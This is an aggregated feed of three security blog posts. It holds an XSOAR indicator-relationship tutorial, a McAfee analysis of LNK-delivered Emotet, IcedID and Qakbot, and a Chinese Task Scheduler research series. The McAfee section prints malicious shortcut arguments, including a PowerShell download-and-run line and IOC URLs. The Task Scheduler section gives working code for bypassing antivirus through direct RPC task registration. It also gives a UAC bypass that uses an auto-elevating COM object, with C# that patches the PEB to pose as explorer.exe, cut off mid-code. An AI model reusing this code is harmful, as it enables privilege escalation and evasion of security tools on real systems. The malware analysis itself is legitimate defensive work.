indicator_relationship = EntityRelationship(
    name=EntityRelationship.Relationships.USES,
    entity_a="u4872",
    entity_a_type="Account",
    entity_b="ict135456.domain.local",
    entity_b_type="Host"
)

In the name attribute, you add which relationship you want to create. Best to use the Relationships Enum subclass in case the string values of the relationship names change in a future release.

In the entity_a attribute, add the value of the source indicator.

In the entity_a_type attribute, add the type of the source indicator.

In the entity_b attribute, add the value of the destination indicator.

In the entity_b_type attribute, add the type of the destination indicator.

When initializing the EntityRelationship class, it will validate all the required attributes to see if all information is present to create the relationship. If not, a ValueError exception will be raised.

Create Indicator Relationships

Now we know which class to use, let’s create the indicator relationships in Cortex XSOAR.

For each relationship we want to create, an instance of the EntityRelationship which describes the relationship between the indicators should be added to a list :

indicator_relationships = []

indicator_relationships.append(
    EntityRelationship(
        name=EntityRelationship.Relationships.USES,
        entity_a="u4872",
        entity_a_type="Account",
        entity_b="ict135456.domain.local",
        entity_b_type="Host"
    )
)

indicator_relationships.append(
    EntityRelationship(
        name=EntityRelationship.Relationships.BEACONS_TO,
        entity_a="78.132.17.56",
        entity_a_type="IP",
        entity_b="ict135456.domain.local",
        entity_b_type="Host"
    )
)

indicator_relationships.append(
    EntityRelationship(
        name=EntityRelationship.Relationships.ATTRIBUTED_BY,
        entity_a="38-DA-09-8D-57-B1",
        entity_a_type="MAC",
        entity_b="ict135456.domain.local",
        entity_b_type="Host"
    )
)

indicator_relationships.append(
    EntityRelationship(
        name=EntityRelationship.Relationships.USES,
        entity_a="10.15.62.78",
        entity_a_type="IP",
        entity_b="ict135456.domain.local",
        entity_b_type="Host"
    )
)

To create the relationships in Cortex XSOAR, the list of EntityRelationship instances needs to be returned in an instance of the CommandResults class using the return_results function:

return_results(
    CommandResults(
        relationships=indicator_relationships
    )
)

If you now open the relationship view of the Host indicator in Cortex XSOAR, you will see that the relationships have been created:

Indicator Relationships

References

https://docs.paloaltonetworks.com/cortex/cortex-xsoar/6-8/cortex-xsoar-threat-intel-management-guide

https://xsoar.pan.dev/docs/reference/api/common-server-python#entityrelationship

https://xsoar.pan.dev/docs/reference/api/common-server-python#relationshipstypes

https://xsoar.pan.dev/docs/reference/api/common-server-python#relationships

https://xsoar.pan.dev/docs/reference/api/common-server-python#commandresults

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the SOAR engineering team lead, he is responsible for the development and deployment of automated workflows in Palo Alto Cortex XSOAR which enable the NVISO SOC analysts to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can contact Wouter via his LinkedIn page.


Want to learn more about SOAR? Sign- up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.
https://forms.office.com/r/dpuep3PL5W

Rise of LNK (Shortcut files) Malware

21 June 2022 at 18:58

Authored by Lakshya Mathur

An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. There are many tools also available to build LNK files, also many people have built “lnkbombs” tools specifically for malicious purposes.

During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.

Figure 1 – Apr to May month geolocation of the LNK attacks
Figure 1 – Apr to May month geolocation of the LNK attacks

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.

Below is a screenshot of how these shortcut files look to a normal user.

Figure 2 _ LNK files as seen by a normal user
Figure 2 _ LNK files as seen by a normal user

LNK THREAT ANALYSIS & CAMPAIGNS

With Microsoft disabling office macros by default malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals.

Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.

We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.

 

EMOTET

Infection-Chain

Figure 3 _Emotet delivered via LNK file Infection-Chain
Figure 3 _Emotet delivered via LNK file Infection-Chain

Threat Analysis

Figure 4 _ Email user received having malicious LNK attached
Figure 4 _ Email user received having malicious LNK attached

In Figure 4 we can see the lure message and attached malicious LNK file.

The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:

Figure 5 _Properties of Emotet LNK sample
Figure 5 _Properties of Emotet LNK sample

As seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The target path as seen in the properties is only visible to 255 characters. However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties.

In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

Figure 6 _ Contents of Emotet LNK file
Figure 6 _ Contents of Emotet LNK file

Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs

The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.

The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet.

ICEDID

Infection-Chain

Figure 7 _ IcedID delivered via LNK file Infection-Chain
Figure 7 _ IcedID delivered via LNK file Infection-Chain

Threat Analysis

This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims.

Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties

Figure 8 _ Properties of IcedID LNK sample
Figure 8 _ Properties of IcedID LNK sample

The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps://hectorcalle[.]com/093789.hta.

The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps://hectorcalle[.]com/listbul.exe

The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.

QAKBOT

Infection-Chain

Figure 9 _ Qakbot delivered via LNK file Infection-Chain
Figure 9 _ Qakbot delivered via LNK file Infection-Chain

Threat Analysis

This attack will show us how attackers can directly hardcode malicious URLs to run along with utilities like PowerShell and download main threat payloads.

Figure 10 _ Properties of Qakbot LNK sample
Figure 10 _ Properties of Qakbot LNK sample

In Figure 10 the full target part argument is “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”

When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png using the Invoke-WebRequest command and the download file is saved under the %temp% folder with the name test.dll

This is the main Qakbot DLL payload which is then executed using the rundll32 utility.

CONCLUSION

As we saw in the above three threat campaigns, it is understood that attackers abuse the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim’s machine. Malicious LNKs are generally seen to be using PowerShell and CMD by which they can connect to malicious URLs to download malicious payloads.

We covered just three of the threat families here, but these files have been seen using other windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user must give a thorough check while using LNK shortcut files. Consumers must keep their Operating system and Anti-Virus up to date. They should beware of phishing mail and clicking on malicious links and attachments.

IOC (Indicators of Compromise)

Type SHA-256 Scanner  
Emotet LNK 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 WSS LNK/Emotet-FSE
IcedID LNK 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 WSS LNK/Agent-FTA

Suspicious ZIP!lnk

Qakbot LNK b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172 WSS LNK/Agent-TSR

 

URLs (Uniform Resource Locator) hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/

hxxp://filmmogzivota[.]rs/SpryAssets/gDR/

hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/

hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/

hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1/

hxxps://hectorcalle[.]com/093789.hta

hxxps://hectorcalle[.]com/listbul.exe

hxxps://green-a-thon[.]com/LosZkUvr/B.png

WebAdvisor All URLs Blocked

 

The post Rise of LNK (Shortcut files) Malware appeared first on McAfee Blog.

Advanced Windows TaskScheduler Playbook

By: zcgonvh
21 June 2022 at 08:08

Part.1 basic

0x00 前言

Advanced Windows TaskScheduler Playbook

这个系列是关于Windows计划任务中一些更为本质化的使用,初步估计大概四章。

相比于工具文档或技术文章,我更倾向于将这几篇文章作为传统安全研究的思维笔记,一方面阐述研究过程与思维逻辑,另一方面记录研究成果落地为实战工具的过程。

武器化也好安全开发也罢,将理论基础作为依据,以研究成果作补充,从实战效果作证明的三板斧不能变。

希望在使用之余,能为大家带来研究思路上的启发。

0x01 现象

对Windows对抗有一定研究的,大多都接触过计划任务的相关知识。

作为文档化的组件之一,好处是有完整的官方文档https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page作为参考,例如我们可以几乎不费力气找到很常用的登录自启动代码https://docs.microsoft.com/en-us/windows/win32/taskschd/logon-trigger-example--c---,稍作修改即可直接使用。

坏处是,文档太长了,面向对象的代码也太复杂了(相对于脚本尤其是安全工具而言)。以上文登录自启动的代码为例,十几个API调用,无故引入且无法去掉的taskschd.dll导入,为什么普通用户执行不成功,S-1-5-32-544是什么,TASK_LOGON_GROUP的定义又在哪?

好在我们是安全研究者,安全研究更擅长从结论/状况反推原因,现在来发挥所长:

我们知道计划任务可以通过UI或者命令行方式进行创建,其参数和选项大部分是对应的。

我们知道计划任务可以通过ITaskService接口或是TaskSchedulerClass类以及一系列对象进行操作。

我们知道计划任务可以导出一个XML,通过UI或是命令行均可再将其导入。

我们知道每一个计划任务文件都存放于%SystemRoot%\System32\Tasks目录下,内容和导出的XML完全相同。

所以,从安全研究的角度,这里可以提出一个问题:计划任务的本质是什么?是那些类,还是XML?

如果是类的话,那么XML在其中充当着什么角色,是如何解析的?

如果是XML的话,那么类充当的又是什么角色?

0x02 依据

虽然Windows提供了绝大部分符号,但在此时还没有调试Windows服务的必要。我们在横向移动的过程中依然会用到计划任务程序,那么首先抓个包:

Advanced Windows TaskScheduler Playbook

看到了满屏的RPC调用,对其解密后可以看到以下信息:

Advanced Windows TaskScheduler Playbook

我们看到了几个重点,首先调用号(Opnum)为1;其次RPC Stub Data即调用的参数中明显出现了新任务名称,以及随后的XML。

windows task scheduler rpc为关键字搜索,我们可以找到MS-TSCH协议https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/21e8e86e-ee5a-469d-917f-28a41f3c25a4,依文档所述,这是建立在RPC协议之上、用于远程对计划任务进行增删改查的接口,同时,我们也看到了熟悉的ITaskSchedulerService

Advanced Windows TaskScheduler Playbook

参考ITaskSchedulerService SchRpcRegisterTask (Opnum 1)https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/849c131a-64e4-46ef-b015-9d4c599c5167一章,对比参数可基本进行确认:

Advanced Windows TaskScheduler Playbook

最后,以impacket作为佐证,众所周知atexec.py采用计划任务方式进行利用,其中创建远程计划任务同样通过SchRpcRegisterTask调用:

Advanced Windows TaskScheduler Playbook

于是,我们得到了一个理论依据:微软通过MS-DCERPC协议,在上层构建了MS-TSCH协议,该协议通过XML作为参数,实现了对计划任务的管理。

0x03 本质

有了MS-TSCH作为理论依据,让我们换个思路,尝试从设计者角度进行思考:

(现在,你是一名架构师了)

假设现在一无所有,你会如何设计一个计划任务程序?

首先,所有人都可能调用计划任务,意味着进程应当常驻后台;低权限用户并不能以高权限用户身份进行操作,所以进程需要高权限,并实现模拟机制;高权限后台进程要考虑到特权提升的问题,所以需要存在合理的鉴权机制;计划任务不涉及硬件管理,也并非系统运行所必需,所以无需进入内核。

其次,接受其它进程调用需要有一个合理的通信机制。Windows进程间通信方式众多,出于鉴权考虑,命名管道和alpc均可作为可选项;在易用性方面,alpc和命名管道均有RPC上层封装可用;在性能方面,alpc是毫无疑问的首选(详参微软官方博客alpcport相关)。

之后,出于管理需要,需要支持远程调用。考虑到稳定性,远程通信的方式大多建立在TCP上层;考虑到防火墙与安全性因素,支持加密的HTTPS/SMB/RPC/DCOM是几个可选项;鉴于远程管理往往有着最小配置与降级原则,RPC由于可独立配置、能够通过ncacn_np使用SMB协议通信且不受额外选项干扰,在此优于DCOM;鉴于API统一的原则,统一了本地通信与远程通信的RPC是唯一可选项。

最后,考虑到拓展的需要,需要可拓展的存储方式。考虑到MS-TSCH至少有着十五年的历史,采用XML兼顾可读性与拓展性无可厚非。

于是,有了基于MS-DCERPC与直接XML传递的MS-TSCH协议。

在微软的实现中,Schedule服务以SYSTEM权限运行,同时拥有SeImpersoante、SeAssignPrimaryToken等特权提供不同用户权限的切换。服务通过注册ncalrpc、ncacn_np(atsvc)以及向epmapper注册三种方式公开了本地与远程的RPC调用端点(EndPoint),为调用方提供MS-TSCH协议规定的服务。

好的,我们有了一个通过XML进行通信、且会进行透明鉴权的计划任务服务。

现在,把思路再次转回调用者。

(现在,你是一名程序员。这个功能很重要,怎么实现没人管,明天上线)

不可否认,对照模板编写XML这一做法,对于懒人(我特指初级代码开发人员,无贬义)固然有着无以伦比的方便。但对接过API的都知道,世界上第一痛苦的API就是调用万能接口,第二绝对是通过XML进行数据传递。

MS-TSCH出生在至少十五年前,很不幸,两毒俱全。来想象一下你是个防守方,现在应用一个临时缓解措施,需要建立并下发以下计划任务监控:当事件ID 1234触发时,执行powershell命令调用某个API。

想到要看协议文档就很头疼对吧,想到要写C来调用RPC就更头大了对吧。

所以微软通过COM,在Taskschd.dll内对MS-TSCH进行面向对象封装,其CLSID0F87369F-A4E5-4CFC-BD3E-73E6154572DD,并提供了一系列帮助接口提供Trigger、Action、Folder的抽象。

为了支持脚本功能,为这个类注册了名为Schedule.ServiceProgId,并实现了IDispatch接口,使得VBS/Powershell等脚本语言能够进行快速调用。

这些是纯粹的封装与帮助类,和实际的协议完全无关。

到这里,TaskScheduler服务(Service或RPC EP)的本质也就呼之欲出:鉴权,接收一个XML(无论是帮助类生成的还是自己构建的),注册到自己业务环境内。

从这个角度看来,计划任务的本质和传统WEB并没有任何区别,甚至可以直接用下面这张图进行类比:

Advanced Windows TaskScheduler Playbook

RPC对应HTTP,OPNUM对应Action/Method,XML对应Body。语法、语义、时序完全对应,是的,完美。

实际上,除却纯粹二进制的领域,至少一半的Windows组件能够用这样的方式进行类比。

最后,我们把思维转回安全角度。

(放开我,我是信息安全工程师.jpg)

从攻击者视角看,由于绝大部分文档都仅仅讲述对COM API的调用,进而可猜想绝大部分防御措施会针对Taskschd.dll,通过RPC进行绕过可能是一个可行的突破方案。

而从防御者视角看,绕过Taskschd.dll这一wrapper可能会对自身防御体系造成绕过甚至击穿(这里“击穿”二字绝非危言耸听)。

0x04 COM

了解到部分本质之后,我们开始进行更为简洁,更贴近于安全思维的调用。

(不要忘记,我们已经把思维转换回了安全角度)

在参考c++版本示例代码的时候,我们可以看到微软同时提供了XML参考:https://docs.microsoft.com/en-us/windows/win32/taskschd/logon-trigger-example--xml-,并提示了可以使用ITaskFolder::RegisterTask通过XML直接注册计划任务。

随后调用ITaskFolder::RegisterTask来替代之前的繁琐方式(参考代码依然来自MSDN):

    ITaskFolder* pRootFolder = NULL;
    hr = pService->GetFolder(_bstr_t(L"\\"), &pRootFolder);
    if (FAILED(hr))
    {
        printf("Cannot get Root folder pointer: %x", hr);
        pService->Release();
        CoUninitialize();
        return 1;
    }
    IRegisteredTask* pRegisteredTask = NULL;
    pRootFolder->RegisterTask
    (
        _bstr_t(wszTaskName),
        _bstr_t("xml"),
        TASK_CREATE_OR_UPDATE,
        _variant_t(),
        _variant_t(),
        TASK_LOGON_INTERACTIVE_TOKEN,
        _variant_t(),
        &pRegisteredTask
    );

0x05 RPC

同样的,MS-TSCH 6.3 Appendix A.3: SchRpc.idlhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/96c9b399-c373-4490-b7f5-78ec3849444e提供了完整的IDL,通过编译IDL即可直接进行简单的RPC调用:

RpcTryExcept
  {
    wchar_t* pActualPath = 0;
    const wchar_t* xml = L"<!--snipped xml-->";
    _TASK_XML_ERROR_INFO *errorInfo = 0;
    SchRpcRegisterTask
    (
      schrpc_binding_handle,
      L"\\Test Task",
      xml,
      6,
      0,
      0,
      0,
      0,
      &pActualPath,
      &errorInfo
    );
  }
RpcExcept(1)
  {
    DWORD code = RpcExceptionCode(); 
    printf("RPC Exception %d\n", code);
  }
RpcEndExcept;

至少在本文发布的时候,利用直接RPC调用可以绕过相当一部分防护软件对计划任务自启动的拦截。

0x06 总结

本章从协议层面,讲述了Windows计划任务程序从设计、协议、实现均基于XML格式这一基础事实,并以此为基础介绍了更为简单方便的调用。

基础之所以是基础,在于后续相关知识与应用一定会与其具备强关联,而绝非单纯的浅显易懂。

我一直认为,编程思想与设计模式才是最基础的安全技术。在这冗长而无趣的第一章中,我们通过面向对象中抽象封装这两大基础概念,以及背后隐藏的Transport/Channel这个被微软大肆使用的名词(相信如果搜索了上面几节其中的关键字,并且看了原文就一定有印象)来从侧面分析微软的设计思想,从而能够更好地理解组件的运作方式,最终找到其中的薄弱点,并加以利用。

后续几章无一例外,均将以此为基础,来讲几个有趣的应用案例。

Part.2 from COM to UAC bypass and get SYSTEM dirtectly

捉虫:前篇文章0x03本质一节关于COM封装类的CLSID有误,应为0F87369F-A4E5-4CFC-BD3E-73E6154572DD

公众号无法修改,在此记录并望周知。

从本文起,专有名词将以官方英文原文着重标记。

0x00 思考

让我们上一章通过对MS-TSCH进行分析理解,大致明确了微软关于计划任务程序的设计思路:以文档化XML格式作为描述、RPC协议为基础,在公开函数式RPC调用的同时,通过COM Helper实现面向对象。

编程思想与设计模式才应当是最基础的安全技术,微软在计划任务程序设计中明显体现了一个进化的思想,从面向过程进化到面向对象,这个过程就是常说的封装

让我们继续用常见的Web角度进行类比,可以理解为:

PHP5进化至PHP7。
PHP/ASP进化至Java/.Net。
JS进化至TS/ES6。

(在开发与设计层面,一些思想是统一且几乎不会改变的)

和渗透时常用的脚本或工具不同,在一个完整的系统中,无论是一套封装后的组件,或是一组完善的协议实现,其本身并没有实现之外的任何意义。只有在使用者(或称“调用方”)根据某些业务逻辑进行调用,随之多个完整的业务功能按照相关逻辑组成一套系统,此时的组件才称得上“有意义”。

(如果你认同这个观点,那么所看到的每一个渗透技巧事件追踪漏洞分析都能找到例子进行类比。毋庸置疑,每一个

计划任务程序作为文档化组件之一,我们当然可以直接根据文档进行调用。无论是直接利用十五年前微软提供的C/C++或者VBS,或是进一步利用十四年前vs2008附带的的C# Interop,再或是利用十年前用烂的的PowerShell都能够直接产生一些红队(Redteam)武器化(Weaponize)渗透测试工具(Pentesting Tools)

感谢微软提供了丰富的API为渗透测试带来方便,但回归研究者思路,我们不该忽略这一点:计划任务作为重要系统组件之一,被广泛应用于系统多个功能模块中。

所以,让我们来思考一组问题:

有哪些自带功能调用了计划任务?
这个功能可以起到什么作用?
这个功能是否进行了组件化,即可以通过某种方式进行调用?
是否存在利用或滥用的可能?

0x01 基础

在回答这个问题之前,让我们重温COM基础。

微软提供了非常完善的基础知识文档https://docs.microsoft.com/en-us/windows/win32/com/com-fundamentals,以及配套的示例代码,这些文档和代码的历史至少可以追溯至Windows 2000的时代。

(我不想在查找资料上花太多篇幅。根据个人经验,花费两天时间,拿出挖洞找链的劲头,配合写论文找参考资料的态度,将原文从头到尾啃一遍,比看十篇技术文章都要有用的多。包括你在看的这篇

参考文档顺便查漏补缺,我们重新回忆一下最为基础的知识点:

1.在设计层面,COM模型分为接口实现

例如计划任务示例代码中的ITaskService

2.区分COM组件的唯一标识为Guid,分别为针对接口的IID(Interface IDentifier)与针对类的CLSID(CLaSs IDentifier)

例如CLSID_TaskScheduler定义为0F87369F-A4E5-4CFC-BD3E-73E6154572DD

3.COM组件需要在注册表内进行注册才可进行调用。通常情况下,系统预定义组件注册于HKEY_LOCAL_MACHINE\SOFTWARE\Classes,用户组件注册于HKEY_CURRENT_USER\SOFTWARE\ClassesHKEY_CLASSES_ROOT为二者合并后的视图,在系统服务角度等同于HKEY_LOCAL_MACHINE\SOFTWARE\Classes

例如计划任务组件的注册信息注册于HKEY_CLASSES_ROOT\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}

4.Windows最小的可独立运行单元是进程,最小的可复用的代码单元为类库,所以COM同样存在进程外(In-Process)进程内(Out-Of-Process)两种实现方式。多数情况下,进程外COM组件为一个exe,进程内COM组件为一个dll。

例如计划任务的COM对象为进程内组件,由taskschd.dll实现。

5.为方便COM组件调用,可以通过ProgId(Programmatic IDentifier)CLSID指定别名。

例如计划任务组件的ProgId为Schedule.Service.1

6.客户端调用CoCreateInstanceCoCreateInstanceExCoGetClassObject等函数时,将创建具有指定CLSID的对象实例,这个过程称为激活(Activation)

例如微软示例代码中的CoCreateInstance(CLSID_TaskScheduler,....)

7.COM采用工厂模式对调用方与实现方进行解耦,包括进程内外COM组件激活、通信、转换,IUnknown::QueryInterfaceIClassFactory始终贯穿其中。

例如微软示例代码中的一大堆QueryInterface

现在,我们有了对COM的基本认知,接下来要在一个庞大、复杂的操作系统之中,跟踪一个微小的COM对象调用了。无论多么复杂的系统,归根结底由人开发,由编译器编译。我们知道Windows的编译器为VS,语言为微软风格的C/C++,开发者为三哥

那么来到思考时间:你是一名三哥程序猿,恒河水使你的代码和你的身体一样无比健壮。现在,你要用VS建立一个C/C++项目,里面调用计划任务做一些事。

-你会怎么写?

-#include <taskschd.h>

-为什么?

-“标准”示例如此。

很好,我们得到了第一种方式:

在所有系统组件中搜索字符串形式的0F87369F-A4E5-4CFC-BD3E-73E6154572DD,以及其二进制表现形式。

然后重新把思维切换回安全领域,暂时客串一番样本分析:你是一名应急响应工程师,陆莲花胃脑虫被你里里外外反反复复上上下下肆意玩弄得不成马形。现在你出台到了客户内网分析一批恶意样本,已知其中某样本会创建计划任务,在没自动化沙箱的情况下怎样能把它揪出来进行后续分析?

-那TM还用说?ProcMon开起来、某绒刀砍它。

于是我们有了第二种方式:

跟踪注册表HKEY_CLASSES_ROOT\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32的读取,通过日志、Hook、劫持等等方式获取调用栈。

最后,把思维切到我们最熟悉的安全开发/红蓝对抗:现在洋大人发了个框架,能随意拓展巨牛逼,能过宇宙杀软加计划任务巨好用,还有源码能抄简直是洋菩萨。唯一一个问题:不知道在哪调了计划任务,就看到一堆配置文件一堆设计模式。

-直接扔到IDE里面搜CLSID、IID、ProgId反过去找引用啊

我们拿到了第三种方式:

考虑到工厂与动态调用,在配置文件等静态数据中搜索0F87369F-A4E5-4CFC-BD3E-73E6154572DD,以及其二进制表现形式。

0x02 发现

现在,我们有三种可行方案来进行跟踪了。

思考一下三种方式的优劣:第二种动态追踪的方式能够直观的找到调用方,但一个前提是必须存在活动的调用。
计划任务功能并不是一个需要频繁调用的功能,Windows的复杂性也决定了无法手动访问每一个功能,所以不妨暂时搁置。

第一三种均可归结为静态查找,考虑到我们研究的目标基于COM,而COM绝大多数配置基于注册表,所以首先在注册表这个最大的公共配置文件内进行搜索,可以得到如图所示结果:

Advanced Windows TaskScheduler Playbook
C:\>reg query HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0} /s

HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}
    (默认)    REG_SZ    Virtual Factory for MaintenanceUI
    AppId    REG_SZ    {A6BFEA43-501F-456F-A845-983D3AD7B8F0}
    LocalizedString    REG_EXPAND_SZ    @%SystemRoot%\System32\MaintenanceUI.dll,-1

HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}\Elevation
    Enabled    REG_DWORD    0x1

HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}\InProcServer32
    (默认)    REG_EXPAND_SZ    %SystemRoot%\System32\shpafact.dll
    ThreadingModel    REG_SZ    Apartment

HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}\VirtualServerObjects
    {0f87369f-a4e5-4cfc-bd3e-73e6154572dd}    REG_SZ

我们发现了一个可疑的东西:

一个由%SystemRoot%\System32\shpafact.dll实现的未文档化COM组件A6BFEA43-501F-456F-A845-983D3AD7B8F0
一个未文档化的自定义注册表项VirtualServerObjects,其值包含计划任务组件CLSID。
Elevation@Enabled=1,意味着可以进行UAC自动提升。

接下来要做的,就是对这个组件进行分析,找到其设计层面的意义,以及探寻是否存在利用的可能。

0x03 分析

接下来,我们开始分析COM所实现功能,以及是否可以利用。

%SystemRoot%\System32\shpafact.dll代码量极少,让我们用五分钟时间进行快速分析。首先根据https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-dllgetclassobject,COM通过固定导出函数DllGetClassObject创建实例,shpafact.dll创建了CClassFactory作为工厂类:

Advanced Windows TaskScheduler Playbook

CClassFactory作为工厂支持创建多个对象,我们的目标组件A6BFEA43-501F-456F-A845-983D3AD7B8F0并非已知的两个CLSID之一,将进入最下方CElevatedFactoryServer::CreateInstance分支:

Advanced Windows TaskScheduler Playbook

CElevatedFactoryServer::CreateInstance方法最终将直接返回CElevatedFactoryServer对象实例:

Advanced Windows TaskScheduler Playbook

CElevatedFactoryServer对象继承自IUnknown,且仅有一个对象方法ServerCreateInstance

Advanced Windows TaskScheduler Playbook

ServerCreateInstance方法签名为HRESULT thiscall ServerCreateInstance(REFCLSID,REFIID,PVOID*),当REFCLSID参数已在VirtualServerObjects注册表项注册的情况下,将直接创建指定CLSID的对象:

Advanced Windows TaskScheduler Playbook

根据QueryInterface方法可得到IID_ElevatedFactoryServer为804bd226-af47-4d71-b492-443a57610b08

Advanced Windows TaskScheduler Playbook

此时我们拿到了COM调用必需的CLSIDIID虚函数表方法签名,稍作整理即可得到以下IDL

[uuid(804bd226-af47-4d71-b492-443a57610b08)]
interface IElevatedFactoryServer : IUnknown {
    HRESULT _stdcall ServerCreateInstance(REFCLSID rclsid,REFIID riid,LPVOID* ppvobj);
};

[uuid(A6BFEA43-501F-456F-A845-983D3AD7B8F0)]
coclass ElevatedFactoryServer {
    interface IElevatedFactoryServer;
};

0x04 调用

获取到IDL之后,直接使用合适的语言进行调用即可,例如转换为C#等价Interop代码:

[Guid("804bd226-af47-4d71-b492-443a57610b08")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
interface IElevatedFactoryServer
{
  [return: MarshalAs(UnmanagedType.Interface)]
  object ServerCreateElevatedObject([In, MarshalAs(UnmanagedType.LPStruct)] Guid rclsid, [In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);
}

我们需要创建提升后的(Elevated)COM对象,所以必须使用CoGetObject结合Elevation Moniker进行激活:

BIND_OPTS3 opt = new BIND_OPTS3();
opt.cbStruct = (uint)Marshal.SizeOf(opt);
opt.dwClassContext = 4;
var srv = CoGetObject("Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}", ref opt, new Guid("{00000000-0000-0000-C000-000000000046}")) as IElevatedFactoryServer;

随后调用ServerCreateElevatedObject方法获取ITaskService实例:

var svc = srv.ServerCreateElevatedObject(new Guid("{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}"), new Guid("{00000000-0000-0000-C000-000000000046}")) as ITaskService;

这个ITaskService实例实际上在提升后的进程中运行,所以可使用TASK_RUNLEVEL_HIGHEST标记创建以完整令牌运行的计划任务,这等价于将xml文件Task\Principals\Principal\RunLevel的值指定为HighestAvailable

<Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
</Principals>

使用此xml进行注册:

svc.Connect();
var folder = svc.GetFolder("\\");
var task = folder.RegisterTask("Test Task", xml, 0, null, null, TaskLogonType.InteractiveToken, null);
task.Run(null);

以及不要忘记对当前进程PEB进行Patch:

var fake = "explorer.exe";
var fake2 = @"c:\windows\explorer.exe";
var PPEB = RtlGetCurrentPeb();
PEB PEB = (PEB)Marshal.PtrToStructure(PPEB, typeof(PEB));
bool x86 = Marshal.SizeOf(typeof(IntPtr)) == 4;
var pImagePathName = new IntPtr(PEB.ProcessParameters.ToInt64() + (x86 ? 0x38 : 0x60));
var pCommandLine = new IntPtr(PEB.ProcessParameters.ToInt64() + (x86 ? 0x40 : 0x70));
RtlInitUnicodeString(pImagePathName, fake2);
RtlInitUnicodeString(pCommandLine, fake2);

PEB_LDR_DATA PEB_LDR_DATA = (PEB_LDR_DATA)Marshal.PtrToStructure(PEB.Ldr, typeof(PEB_LDR_DATA));
LDR_DATA_TABLE_ENTRY LDR_DATA_TABLE_ENTRY;
var pFlink = new IntPtr(PEB_LDR_DATA.InLoadOrderModuleList.Flink.ToInt64());
var first = pFlink;
do
{
    LDR_DATA_TABLE_ENTRY = (LDR_DATA_TABLE_ENTRY)Marshal.PtrToStructure(pFlink, typeof(LDR_DATA_TABLE_ENTRY));
    if (LDR_DATA_TABLE_ENTRY.FullDllName.Buffer.ToInt64() < 0 || LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer.ToInt64() < 0)
    {
        pFlink = LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink;
        continue;
    }
    try
    {
        if (Marshal.PtrToStringUni(LDR_DATA_TABLE_ENTRY.FullDllName.Buffer).EndsWith(".exe"))
        {
